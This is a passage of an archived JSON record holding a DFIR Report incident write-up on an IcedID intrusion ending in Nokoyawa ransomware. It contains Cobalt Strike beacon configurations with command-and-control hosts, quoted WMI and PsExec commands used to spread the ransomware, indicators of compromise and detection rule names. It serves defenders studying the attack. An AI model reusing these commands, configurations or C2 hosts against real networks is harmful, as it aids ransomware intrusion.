\"AAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\n \"stage\": {\r\n \"cleanup\": true\r\n },\r\n \"ssh\": {\r\n \"hostname\": null,\r\n \"port\": null,\r\n \"username\": null,\r\n \"password\": null,\r\n \"privatekey\": null\r\n }\r\n}\r\nDomain IP Port JA3 JA3s\r\niconnectgs[.]com 50.3.132.232 8081 N/A N/A\r\n[{\r\n \"spawnto\": \"AAAAAAAAAAAAAAAAAAAAAA\\u003d\\u003d\",\r\n \"pipename\": null,\r\n \"dns_beacon\": {\r\n \"put_metadata\": null,\r\n \"get_TXT\": null,\r\nhttps://thedfirreport.com/2023/05/22/icedid-macro-ends-in-nokoyawa-ransomware/\r\nPage 20 of 33\n\n\"get_AAAA\": null,\r\n \"get_A\": null,\r\n \"beacon\": null,\r\n \"maxdns\": null,\r\n \"dns_sleep\": null,\r\n \"put_output\": null,\r\n \"dns_idle\": null\r\n },\r\n \"smb_frame_header\": \"AAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\n \"post_ex\": {\r\n \"spawnto_x64\": \"%windir%\\\\sysnative\\\\svchost.exe\",\r\n \"spawnto_x86\": \"%windir%\\\\syswow64\\\\svchost.exe\"\r\n },\r\n \"stage\": {\r\n \"cleanup\": 
\"true\"\r\n },\r\n \"process_inject\": {\r\n \"stub\": \"snNvHLupDUIob8Qr+6dPTQ\\u003d\\u003d\",\r\n \"transform_x64\": [\"prepend \\u0027\\\\x90\\\\x90\\\\x90\\\\x90\\u0027\"],\r\n \"transform_x86\": [\"prepend \\u0027\\\\x90\\\\x90\\\\x90\\\\x90\\u0027\"],\r\n \"startrwx\": \"false\",\r\n \"min_alloc\": \"5271\",\r\n \"userwx\": \"false\",\r\n \"execute\": [\"CreateThread\", \"RtlCreateUserThread\", \"CreateRemoteThread\"],\r\n \"allocator\": \"VirtualAllocEx\"\r\n },\r\n \"uses_cookies\": \"true\",\r\n \"http_post_chunk\": \"0\",\r\n \"ssh\": {\r\n \"privatekey\": null,\r\n \"username\": null,\r\n \"password\": null,\r\n \"port\": null,\r\n \"hostname\": null\r\n },\r\n \"useragent_header\": null,\r\n \"maxgetsize\": \"1864478\",\r\n \"proxy\": {\r\n \"behavior\": \"Use IE settings\",\r\n \"password\": null,\r\n \"username\": null,\r\n \"type\": null\r\n },\r\n \"tcp_frame_header\": \"AAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\n \"server\": {\r\n \"publickey\": \"MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCrr8AvQMH9nOuqc7x6r58gsuNMYuuRdKcMgo3iPMjQgM1u5BNXqKJB\r\n \"port\": \"8081\",\r\n \"hostname\": \"iconnectgs.com\"\r\n },\r\n \"beacontype\": [\"HTTP\"],\r\n \"kill_date\": null,\r\n \"license_id\": \"0\",\r\n \"jitter\": \"43\",\r\n \"sleeptime\": \"62004\",\r\n \"http_get\": {\r\n \"server\": {\r\n \"output\": [\"print\", \"prepend 338 characters\", \"base64\", \"base64\"]\r\n },\r\n \"client\": {\r\n \"metadata\": [],\r\n \"headers\": []\r\n },\r\n \"verb\": \"GET\",\r\n \"uri\": \"/hr\"\r\n },\r\n \"cfg_caution\": \"false\",\r\n \"host_header\": \"\",\r\n \"crypto_scheme\": \"0\",\r\n \"http_post\": {\r\n \"client\": {\r\n \"output\": [],\r\nhttps://thedfirreport.com/2023/05/22/icedid-macro-ends-in-nokoyawa-ransomware/\r\nPage 21 of 33\n\n\"id\": [],\r\n \"headers\": []\r\n },\r\n \"verb\": \"POST\",\r\n \"uri\": \"/mobile-home\"\r\n }\r\n}, {\r\n \"spawnto\": \"AAAAAAAAAAAAAAAAAAAAAA\\u003d\\u003d\",\r\n 
\"pipename\": null,\r\n \"dns_beacon\": {\r\n \"put_metadata\": null,\r\n \"get_TXT\": null,\r\n \"get_AAAA\": null,\r\n \"get_A\": null,\r\n \"beacon\": null,\r\n \"maxdns\": null,\r\n \"dns_sleep\": null,\r\n \"put_output\": null,\r\n \"dns_idle\": null\r\n },\r\n \"smb_frame_header\": \"AAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\n \"post_ex\": {\r\n \"spawnto_x64\": \"%windir%\\\\sysnative\\\\svchost.exe\",\r\n \"spawnto_x86\": \"%windir%\\\\syswow64\\\\svchost.exe\"\r\n },\r\n \"stage\": {\r\n \"cleanup\": \"true\"\r\n },\r\n \"process_inject\": {\r\n \"stub\": \"snNvHLupDUIob8Qr+6dPTQ\\u003d\\u003d\",\r\n \"transform_x64\": [\"prepend \\u0027\\\\x90\\\\x90\\\\x90\\\\x90\\u0027\"],\r\n \"transform_x86\": [\"prepend \\u0027\\\\x90\\\\x90\\\\x90\\\\x90\\u0027\"],\r\n \"startrwx\": \"false\",\r\n \"min_alloc\": \"5271\",\r\n \"userwx\": \"false\",\r\n \"execute\": [\"CreateThread\", \"RtlCreateUserThread\", \"CreateRemoteThread\"],\r\n \"allocator\": \"VirtualAllocEx\"\r\n },\r\n \"uses_cookies\": \"true\",\r\n \"http_post_chunk\": \"0\",\r\n \"ssh\": {\r\n \"privatekey\": null,\r\n \"username\": null,\r\n \"password\": null,\r\n \"port\": null,\r\n \"hostname\": null\r\n },\r\n \"useragent_header\": null,\r\n \"maxgetsize\": \"1864478\",\r\n \"proxy\": {\r\n \"behavior\": \"Use IE settings\",\r\n \"password\": null,\r\n \"username\": null,\r\n \"type\": null\r\n },\r\n \"tcp_frame_header\": \"AAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\n \"server\": {\r\n \"publickey\": \"MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCrr8AvQMH9nOuqc7x6r58gsuNMYuuRdKcMgo3iPMjQgM1u5BNXqKJB\r\n \"port\": \"8081\",\r\n \"hostname\": \"iconnectgs.com\"\r\n },\r\n \"beacontype\": [\"HTTP\"],\r\n \"kill_date\": null,\r\n \"license_id\": \"0\",\r\n \"jitter\": \"43\",\r\n \"sleeptime\": \"62004\",\r\n \"http_get\": {\r\n \"server\": {\r\n \"output\": [\"print\", \"prepend 338 characters\", \"base64\", 
\"base64\"]\r\n },\r\n \"client\": {\r\nhttps://thedfirreport.com/2023/05/22/icedid-macro-ends-in-nokoyawa-ransomware/\r\nPage 22 of 33\n\n\"metadata\": [],\r\n \"headers\": []\r\n },\r\n \"verb\": \"GET\",\r\n \"uri\": \"/hr\"\r\n },\r\n \"cfg_caution\": \"false\",\r\n \"host_header\": \"\",\r\n \"crypto_scheme\": \"0\",\r\n \"http_post\": {\r\n \"client\": {\r\n \"output\": [],\r\n \"id\": [],\r\n \"headers\": []\r\n },\r\n \"verb\": \"POST\",\r\n \"uri\": \"/mobile-home\"\r\n }\r\n}]\r\nDomain IP Port JA3 JA3s\r\nN/A 5.8.18.242 443 72a589da586844d7f0818ce684948eea f176ba63b4d68e576b5ba345bec2c7b7\r\n[{\r\n \"spawnto\": \"AAAAAAAAAAAAAAAAAAAAAA\\u003d\\u003d\",\r\n \"pipename\": null,\r\n \"dns_beacon\": {\r\n \"put_metadata\": null,\r\n \"get_TXT\": null,\r\n \"get_AAAA\": null,\r\n \"get_A\": null,\r\n \"beacon\": null,\r\n \"maxdns\": null,\r\n \"dns_sleep\": null,\r\n \"put_output\": null,\r\n \"dns_idle\": null\r\n },\r\n \"smb_frame_header\": \"AAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\n \"post_ex\": {\r\n \"spawnto_x64\": \"%windir%\\\\sysnative\\\\rundll32.exe\",\r\n \"spawnto_x86\": \"%windir%\\\\syswow64\\\\rundll32.exe\"\r\n },\r\n \"stage\": {\r\n \"cleanup\": \"false\"\r\n },\r\n \"process_inject\": {\r\n \"stub\": \"tUr+Aexqde3zXhpE+L05KQ\\u003d\\u003d\",\r\n \"transform_x64\": [],\r\n \"transform_x86\": [],\r\n \"startrwx\": \"true\",\r\n \"min_alloc\": \"0\",\r\n \"userwx\": \"true\",\r\n \"execute\": [\"CreateThread\", \"SetThreadContext\", \"CreateRemoteThread\", \"RtlCreateUserThread\"],\r\n \"allocator\": \"VirtualAllocEx\"\r\n },\r\n \"uses_cookies\": \"true\",\r\n \"http_post_chunk\": \"0\",\r\n \"ssh\": {\r\n \"privatekey\": null,\r\n \"username\": null,\r\n \"password\": null,\r\n \"port\": null,\r\n \"hostname\": null\r\n },\r\n \"useragent_header\": null,\r\n \"maxgetsize\": \"1048576\",\r\n \"proxy\": {\r\n \"behavior\": \"Use IE settings\",\r\n \"password\": 
null,\r\nhttps://thedfirreport.com/2023/05/22/icedid-macro-ends-in-nokoyawa-ransomware/\r\nPage 23 of 33\n\n\"username\": null,\r\n \"type\": null\r\n },\r\n \"tcp_frame_header\": \"AAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\n \"server\": {\r\n \"publickey\": \"MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCnOM3nXx+7HBhkbDd+AwFrFisSunK999w2tM0uTpuuEiBalcJhcL+Q\r\n \"port\": \"80\",\r\n \"hostname\": \"5.8.18.242\"\r\n },\r\n \"beacontype\": [\"HTTP\"],\r\n \"kill_date\": null,\r\n \"license_id\": \"305419776\",\r\n \"jitter\": \"0\",\r\n \"sleeptime\": \"60000\",\r\n \"http_get\": {\r\n \"server\": {\r\n \"output\": [\"print\"]\r\n },\r\n \"client\": {\r\n \"metadata\": [],\r\n \"headers\": []\r\n },\r\n \"verb\": \"GET\",\r\n \"uri\": \"/pixel.gif\"\r\n },\r\n \"cfg_caution\": \"false\",\r\n \"host_header\": \"\",\r\n \"crypto_scheme\": \"0\",\r\n \"http_post\": {\r\n \"client\": {\r\n \"output\": [],\r\n \"id\": [],\r\n \"headers\": []\r\n },\r\n \"verb\": \"POST\",\r\n \"uri\": \"/submit.php\"\r\n }\r\n}, {\r\n \"spawnto\": \"AAAAAAAAAAAAAAAAAAAAAA\\u003d\\u003d\",\r\n \"pipename\": null,\r\n \"dns_beacon\": {\r\n \"put_metadata\": null,\r\n \"get_TXT\": null,\r\n \"get_AAAA\": null,\r\n \"get_A\": null,\r\n \"beacon\": null,\r\n \"maxdns\": null,\r\n \"dns_sleep\": null,\r\n \"put_output\": null,\r\n \"dns_idle\": null\r\n },\r\n \"smb_frame_header\": \"AAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\n \"post_ex\": {\r\n \"spawnto_x64\": \"%windir%\\\\sysnative\\\\rundll32.exe\",\r\n \"spawnto_x86\": \"%windir%\\\\syswow64\\\\rundll32.exe\"\r\n },\r\n \"stage\": {\r\n \"cleanup\": \"false\"\r\n },\r\n \"process_inject\": {\r\n \"stub\": \"tUr+Aexqde3zXhpE+L05KQ\\u003d\\u003d\",\r\n \"transform_x64\": [],\r\n \"transform_x86\": [],\r\n \"startrwx\": \"true\",\r\n \"min_alloc\": \"0\",\r\n \"userwx\": \"true\",\r\n \"execute\": [\"CreateThread\", \"SetThreadContext\", 
\"CreateRemoteThread\", \"RtlCreateUserThread\"],\r\n \"allocator\": \"VirtualAllocEx\"\r\n },\r\n \"uses_cookies\": \"true\",\r\n \"http_post_chunk\": \"0\",\r\nhttps://thedfirreport.com/2023/05/22/icedid-macro-ends-in-nokoyawa-ransomware/\r\nPage 24 of 33\n\n\"ssh\": {\r\n \"privatekey\": null,\r\n \"username\": null,\r\n \"password\": null,\r\n \"port\": null,\r\n \"hostname\": null\r\n },\r\n \"useragent_header\": null,\r\n \"maxgetsize\": \"1048576\",\r\n \"proxy\": {\r\n \"behavior\": \"Use IE settings\",\r\n \"password\": null,\r\n \"username\": null,\r\n \"type\": null\r\n },\r\n \"tcp_frame_header\": \"AAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\n \"server\": {\r\n \"publickey\": \"MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCnOM3nXx+7HBhkbDd+AwFrFisSunK999w2tM0uTpuuEiBalcJhcL+Q\r\n \"port\": \"443\",\r\n \"hostname\": \"5.8.18.242\"\r\n },\r\n \"beacontype\": [\"HTTPS\"],\r\n \"kill_date\": null,\r\n \"license_id\": \"305419776\",\r\n \"jitter\": \"0\",\r\n \"sleeptime\": \"60000\",\r\n \"http_get\": {\r\n \"server\": {\r\n \"output\": [\"print\"]\r\n },\r\n \"client\": {\r\n \"metadata\": [],\r\n \"headers\": []\r\n },\r\n \"verb\": \"GET\",\r\n \"uri\": \"/dot.gif\"\r\n },\r\n \"cfg_caution\": \"false\",\r\n \"host_header\": \"\",\r\n \"crypto_scheme\": \"0\",\r\n \"http_post\": {\r\n \"client\": {\r\n \"output\": [],\r\n \"id\": [],\r\n \"headers\": []\r\n },\r\n \"verb\": \"POST\",\r\n \"uri\": \"/submit.php\"\r\n }\r\n}]\r\nExfiltration\r\nDuring the intrusion, the threat actors targeted password documents on network shares. We observed these being taken and\r\nopened off network through the use of canaries. 
No overt exfiltration was observed, so we assess that this occurred over\r\nexisting command and control channels.\r\nThe threat actors opened the document from the IP:\r\n45.61.139.126\r\nImpact\r\nThreat actors deployed Nokoyawa ransomware from one of the servers using WMI and PsExec. They first copied the\r\nransomware binary, k.exe, and a batch script, p.bat, using WMI:\r\nwmic /node:\"TARGET_HOST_IP\" /user:\"DOMAIN\\USER\" /password:\"PASSWORD\" process call create \"cmd.exe /c copy \\\\SO\r\nCommand spawned by WmiPrvSE.exe:\r\ncmd.exe /c copy \\\\SOURCE_SERVER_IP\\c$\\windows\\temp\\k.exe c:\\windows\\temp\\\r\nA snippet of SMB network traffic generated by the above command:\r\nThe p.bat file is a simple batch script that runs the k.exe binary with a Base64-encoded configuration:\r\nc:\\windows\\temp\\k.exe --config REDACTED\r\nThe redacted parameter passed to the `--config` flag decodes to:\r\n{\"EXTENSION\": \"AWAYOKON\", \"NOTE_NAME\": \"AWAYOKON-readme.txt\", \"NOTE_CONTENT\": \"REDACTED\", \"ECC_PUBLIC\": \"lHrYQ\r\nThe decoded configuration shows the ransomware extension, the note name, and the note content encoded in Base64.\r\nThe threat actors also configured a number of directories and extensions to skip, and enabled encryption of network and hidden\r\ndrives. 
DELETE_SHADOW was set to true in order to delete volume shadow copies.\r\nBased on the configuration parameters being passed via the command line and the code being written in C++, the deployment appears\r\nto be part of version 1.1 of the Nokoyawa code base:\r\nRansomware sample code signature:\r\nDebug information shows that the binary was generated a few hours before the encryption:\r\nThe ransomware was then deployed at scale using PsExec to encrypt the Windows domain:\r\npsexec.exe \\\\TARGET_HOST_IP -u DOMAIN\\USER -p \"PASSWORD\" -s -d -h -r mstdc -accepteula -nobanner c:\\windows\\t\r\nA ransom message was left in each directory where files were encrypted.\r\nAfter encryption, contact was made with the threat actors using their support site, and the price of the ransom was quoted at\r\n~$200,000 USD in Bitcoin. 
No ransom was paid as a result of this intrusion.\r\nTimeline\r\nDiamond Model\r\nIndicators\r\nAtomic\r\nCobalt Strike\r\n50.3.132[.]232:8081 / iconnectgs[.]com\r\n5.8.18[.]242:443\r\n23.29.115[.]152:757 / aicsoftware[.]com\r\n23.29.115[.]152:8080 / aicsoftware[.]com\r\nPowerShell Cobalt Strike Downloader\r\nhttps://aicsoftware[.]com:757/coin\r\nIcedID Excel Download URL\r\nhttps://simipimi[.]com\r\nIcedID C2\r\nkicknocisd[.]com\r\n159.65.169[.]200\r\n45.66.248[.]119:443 / guaracheza[.]pics | belliecow[.]wiki\r\n198.244.180.66:443 / curabiebarristie[.]com | stayersa[.]art\r\nBackConnect\r\n137.74.104[.]108:8080\r\nComputed\r\n1.bat\r\nb5db398832461be8d93fdbda120088aa\r\nb36748a27b8e68710701286106ad434c9afea6fa\r\n30a334da51d22b2fe6e33970df8d0f81396394de9d3a3c224751aacb2202b0db\r\n1.dll\r\n9740f2b8aeacc180d32fc79c46333178\r\nc599c32d6674c01d65bff6c7710e94b6d1f36869\r\nd3db55cd5677b176eb837a536b53ed8c5eabbfd68f64b88dd083dc9ce9ffb64e\r\n4_202210250456866742.xls\r\nd3032968085db665381d9cbd3569f330\r\n9230520c6dd215e2152bb2e56b2a5d6b45ae8e13\r\neb84a283ff58906786d63ffe43a8ff2728584428f5f7d9972c664f63f8790113\r\n7030270\r\n964c94b217d102e53a227bcbc94ae52e\r\nb846e89d0f56851696d50b5e64c6e758ddae3e6a\r\n091886c95ca946aedee24b7c751b5067c5ac875923caba4d3cc9d961efadb65d\r\nk.exe\r\n40c9dc2897b6b348da88b23deb0d3952\r\n0f5457b123e60636623f585cc2bf2729f13a95d6\r\n7095beafff5837070a89407c1bf3c6acf8221ed786e0697f6c578d4c3de0efd6\r\nmstdc.exe\r\n7dae150c1df0e01467be3a743775b646\r\nf309b61a8b005b5ce0a3fb58caaa798cfc95f5db\r\n
3c19fee379b4882971834a3d38f3f8b86de560114274375560433778cd505748\r\np.bat\r\n385d21c0438f5b21920aa9eb894740d2\r\n5d2c17799dfc6717f89cd5f63951829aed038041\r\ne351ba5e50743215e8e99b5f260671ca8766886f69d84eabb83e99d55884bc2f\r\nDetections\r\nNetwork\r\nET MALWARE Win32/IcedID Request Cookie\r\nET POLICY OpenSSL Demo CA - Internet Widgits Pty (O)\r\nNF - Malware IcedID BackConnect - Wait Command\r\nNF - Malware IcedID BackConnect - Start VNC command - 11\r\nET MALWARE Meterpreter or Other Reverse Shell SSL Cert\r\nET HUNTING Suspicious Empty SSL Certificate - Observed in Cobalt Strike\r\nET MALWARE Cobalt Strike Malleable C2 Profile (__session__id Cookie)\r\nET SCAN Behavioral Unusual Port 1433 traffic Potential Scan or Infection\r\nET POLICY SMB2 NT Create AndX Request For an Executable File\r\nET RPC DCERPC SVCCTL - Remote Service Control Manager Access\r\nET POLICY PsExec service created\r\nET POLICY SMB Executable File Transfer\r\nET POLICY SMB2 NT Create AndX Request For a .bat File\r\nET POLICY SMB2 NT Create AndX Request For a DLL File - Possible Lateral Movement\r\nSigma\r\nSIGMA Project Repo\r\nNew Process Created Via Wmic.EXE id: 526be59f-a573-4eea-b5f7-f0973207634d\r\nPotential Recon Activity Via Nltest.EXE id: 5cc90652-4cbd-4241-aa3b-4b462fa5a248\r\nCreated Files by Office Applications id: c7a74c80-ba5a-486e-9974-ab9e682bc5e4\r\nCobaltStrike Named Pipe id: d5601f8c-b26f-4ab0-9035-69e11a8d4ad2\r\nSuspicious Group And Account Reconnaissance Activity Using Net.EXE id: d95de845-b83c-4a9a-8a6a-4fc802ebf6c0\r\nPowerShell Download and Execution Cradles id: 85b0b087-eddf-4a2b-b033-d771fa2b9775\r\nMeterpreter or Cobalt Strike Getsystem Service Installation - Security id: ecbc5e16-58e0-4521-9c60-eb9a7ea4ad34\r\nCredential Dumping Tools Accessing LSASS Memory id: 32d0d3e2-e58d-4d41-926b-18b520b2b32d\r\nPotential Defense Evasion Via Rename Of Highly Relevant Binaries id: 0ba1da6d-b6ce-4366-828c-18826c9de23e\r\nDFIR Report Repo\r\nAdFind Discovery id: 
50046619-1037-49d7-91aa-54fc92923604\r\nCHCP CodePage Locale Lookup id: dfbdd206-6cf2-4db9-93a6-0b7e14d5f02f\r\nYara\r\nhttps://github.com/The-DFIR-Report/Yara-Rules/blob/main/18190/18190.yar\r\nMITRE\r\nAccess Token Manipulation: Token Impersonation/Theft - T1134.001\r\nAccount Discovery: Local Account - T1087.001\r\nAccount Discovery: Domain Account - T1087.002\r\nApplication Layer Protocol: Web Protocols - T1071.001\r\nCommand and Scripting Interpreter: Windows Command Shell - T1059.003\r\nCommand-Line Interface: PowerShell - T1059.001\r\nCommand-Line Interface: Visual Basic - T1059.005\r\nData Encrypted for Impact - T1486\r\nDomain Trust Discovery - T1482\r\nFile and Directory Discovery - T1083\r\nIndicator Removal on Host: File Deletion - T1070.004\r\nMasquerading: Rename System Utilities - T1036.003\r\nPhishing: Spearphishing Attachment - T1566.001\r\nProcess Injection - T1055\r\nRemote Services: RDP - T1021.001\r\nRemote Services: SMB/Windows Admin Shares - T1021.002\r\nRemote System Discovery - T1018\r\nScheduled Task/Job: Scheduled Task - T1053.005\r\nSystem Binary Proxy Execution: Rundll32 - T1218.011\r\nSystem Network Configuration Discovery - T1016\r\nValid Accounts - T1078\r\nWMI - T1047\r\nUnsecured Credentials: Credentials In Files - T1552.001\r\nUser Execution: Malicious File - T1204.002\r\nRemote Services: Windows Remote Management - T1021.006\r\nExfiltration Over C2 Channel - T1041\r\nArchive Collected Data: Archive via Utility - T1560.001\r\nIngress Tool Transfer - T1105\r\nWeb Service - T1102\r\nOS Credential Dumping: LSASS Memory - T1003.001\r\nRemote Access Software - T1219\r\nAdFind - S0552\r\nIcedID - S0483\r\nipconfig - S0100\r\nnet - S0039\r\nnltest - S0359\r\nping - S0097\r\nsysteminfo - S0096\r\ncmd - S0106\r\nCobalt Strike - S0154\r\nPsExec - 
S0029\r\nInternal case #18190\r\nSource: https://thedfirreport.com/2023/05/22/icedid-macro-ends-in-nokoyawa-ransomware/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://thedfirreport.com/2023/05/22/icedid-macro-ends-in-nokoyawa-ransomware/"
	],
	"report_names": [
		"icedid-macro-ends-in-nokoyawa-ransomware"
	],
	"threat_actors": [
		{
			"id": "610a7295-3139-4f34-8cec-b3da40add480",
			"created_at": "2023-01-06T13:46:38.608142Z",
			"updated_at": "2026-04-10T02:00:03.03764Z",
			"deleted_at": null,
			"main_name": "Cobalt",
			"aliases": [
				"Cobalt Group",
				"Cobalt Gang",
				"GOLD KINGSWOOD",
				"COBALT SPIDER",
				"G0080",
				"Mule Libra"
			],
			"source_name": "MISPGALAXY:Cobalt",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "20c759c2-cd02-45bb-85c6-41bde9e6a7cf",
			"created_at": "2024-01-18T02:02:34.189827Z",
			"updated_at": "2026-04-10T02:00:04.721082Z",
			"deleted_at": null,
			"main_name": "HomeLand Justice",
			"aliases": [
				"Banished Kitten",
				"Karma",
				"Red Sandstorm",
				"Storm-0842",
				"Void Manticore"
			],
			"source_name": "ETDA:HomeLand Justice",
			"tools": [
				"BABYWIPER",
				"BiBi Wiper",
				"BiBi-Linux Wiper",
				"BiBi-Windows Wiper",
				"Cl Wiper",
				"LowEraser",
				"No-Justice Wiper",
				"Plink",
				"PuTTY Link",
				"RevSocks",
				"W2K Res Kit"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434032,
	"ts_updated_at": 1775826783,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/3daa55dde07770e30de74e806c4c0411f30aecbc.pdf",
		"text": "https://archive.orkl.eu/3daa55dde07770e30de74e806c4c0411f30aecbc.txt",
		"img": "https://archive.orkl.eu/3daa55dde07770e30de74e806c4c0411f30aecbc.jpg"
	}
}